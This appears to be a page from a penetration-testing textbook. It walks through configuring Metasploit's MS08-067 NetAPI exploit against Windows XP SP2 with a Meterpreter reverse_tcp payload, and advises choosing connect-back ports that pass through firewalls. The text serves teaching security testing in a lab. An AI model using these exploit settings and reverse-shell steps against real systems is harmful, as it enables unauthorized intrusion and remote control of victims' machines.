background image

The Joy of Exploitation

67

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.33.130   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.129   yes       The local address
   LPORT     8080             yes       The local port

Exploit target:

   Id  Name
   --  ----
   3   Windows XP SP2 English (NX)

We search for the MS08-067 NetAPI exploit in the Framework at  . 

Then, having found our exploit, we load the 

windows/smb/ms08_067_netapi

 

exploit at  .

Next, at   we set the payload as Windows-based Meterpreter 

reverse_tcp

which, if successful, will start a connection on the target machine and con-
nect back to the attacking machine specified with 

LHOST

. This is important if 

you find that a firewall is in place and you need to bypass incoming controls 
on a firewall or NAT.

Meterpreter

 is a post exploitation tool that we’ll use through this book. One 

of Metasploit’s flagship tools, it makes extracting information or further 
compromising systems significantly easier.

The 

show targets

 command at   allows us to identify the system we want 

to target. (Although many MSF exploits use automatic targeting and don’t 
require this flag, autodetection capability generally fails in MS08-067.)

We then set our target to 

Windows XP SP2 English (NX)

 at  . The 

NX

 stands 

for No Execute. By default in Windows XP SP2, DEP is enabled.

At   we set the IP address of our target machine which, by defining the 

RHOST

 value, is vulnerable to the MS08-067 exploit. 

The 

set LHOST

 command at   specifies our attacking machine’s IP address 

(the Back|Track machine), and the 

LPORT

 option at   specifies the port to 

which our attacker machine will listen for a connection from our target. (When 
you’re setting the 

LPORT

 option, use a standard port that you think will be 

allowed through the firewall: Ports 443, 80, 53, and 8080 are often good 
options.) Finally, we enter 

show options

 at   to make sure that the options are 

set up correctly.